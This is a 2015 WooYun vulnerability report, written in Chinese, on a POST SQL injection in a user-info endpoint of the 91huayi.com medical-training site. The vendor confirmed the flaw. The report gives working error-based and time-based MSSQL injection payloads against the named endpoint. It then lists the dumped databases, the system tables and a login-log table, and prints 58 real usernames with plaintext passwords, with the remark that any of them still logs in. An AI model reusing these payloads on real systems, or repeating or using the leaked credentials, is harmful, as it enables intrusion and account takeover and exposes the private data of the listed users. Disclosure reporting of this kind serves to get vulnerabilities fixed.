漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0142100
漏洞标题:华医网存在post某API存在post注入,设计全部数据库和用户信息
相关厂商:91huayi.com
漏洞作者: 逆流冰河
提交时间:2015-09-19 09:37
修复时间:2015-11-03 09:44
公开时间:2015-11-03 09:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-19: 细节已通知厂商并且等待厂商处理中
2015-09-19: 厂商已经确认,细节仅向厂商公开
2015-09-29: 细节向核心白帽子及相关领域专家公开
2015-10-09: 细节向普通白帽子公开
2015-10-19: 细节向实习白帽子公开
2015-11-03: 细节向公众公开
简要描述:
有一个华医网的洞,不知道和我这一是不是一个注入点
详细说明:
1,直接主题
POST:http://hyuser.91huayi.com/ashx/getUserInfo.ashx" --data="IdCard=55"
Parameter: IdCard (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: IdCard=55'+(SELECT 'zRGO' WHERE 7419=7419 AND 8110=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8110=8110) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)+CHAR(113))))+'
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: IdCard=55'+(SELECT 'CXEq' WHERE 6094=6094 AND 4435=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7))+'
---
2,裤子
available databases [7]:
[*] HY_Common
[*] HY_COMMON_TABLEBACK
[*] master
[*] model
[*] msdb
[*] sync_personnel
[*] tempdb
3,好多表啊
Database: master
[291 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
3,字段呢,数据呢
Table: user_login_log
[5 columns]
+--------------------+------------------+
| Column | Type |
+--------------------+------------------+
| add_time | datetime |
| com_user_entity_id | uniqueidentifier |
| id | uniqueidentifier |
| password | varchar |
| user_name | varchar |
+----------------Table: user_login_log
[58 entries]
+-----------------+------------------+
| user_name | password |
+-----------------+------------------+
| 621400040030 | !@#$<>?3395662hz |
| nx_wangtingting | !wang.1314 |
| nx_caoli | *********caoli |
| 626600004388 | ***1986gzf |
| xixi1014995 | *05032328* |
| 198303224385 | *123456* |
| Joyvivi | *chenchen* |
| heying1993 | *heying1993522. |
| 620401010182 | ......0123456789 |
| 626600018396 | ..00.. |
| 626600005875 | ?885106 |
| 365911537 | @62595175jing |
| 626600003894 | @77625qawwyaq |
| 296600003592 | @asdf6789 |
| chendan19910112 | @CD1234567890 |
| qujing09 | @jgzj@2009825 |
| 296600002932 | @quake! |
| gs_XYX123456 | @XYX7709923579 |
| 626600022863 | @y09t1435@ |
| 296600001226 | 0.123456 |
| 296600002441 | 000 |
| 620503220014 | 000... |
| 626600027870 | 0000 |
| 626600025769 | 00000 |
| zxf6743376 | 000000 |
| qh_fengping | 0000000 |
| 626600024947 | 00000000 |
| nx_ZYZY | 0000000000 |
| 40431135 | 0000000a |
| nx_hxg | 0000007 |
| xiakucaoweiku | 000000sy |
| 296600001328 | 000001 |
| FXPP | 000003 |
| nx_zqp | 000004 |
| nx_pzy | 000005 |
| nx_lvxia | 00000559 |
| nx_zhaoguiqin | 00000563 |
| yangli575 | 00000575 |
| nx_xll | 000006 |
| nx_fan | 000008 |
| 296600001591 | 000011 |
| 00001408lixian | 00001408m |
| 286600000020 | 000020 |
| nx_zhuyu | 00002051 |
| 286600000038 | 000038 |
| 626600004336 | 00004336 |
| fxysy6915286 | 00004418 |
| 626600000050 | 000050 |
| 0000789 | 0000789 |
| 626600000090 | 000090 |
| yxy1214yxw | 00009261qqmyt |
| 626600000093 | 000093 |
| 626600002819 | 0000zhanghu |
| 296600002411 | 0001 |
| 296600002385 | 000111 |
| gs_000123 | 000123 |
| 296600000334 | 000123y |
| 296600002545 | 00013 |
+-----------------+------------------+
随便找一个还能登录
漏洞证明:
如上
修复方案:
Fix
礼物啊
版权声明:转载请注明来源 逆流冰河@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-09-19 09:42
厂商回复:
谢谢提醒!正在修复中!
最新状态:
暂无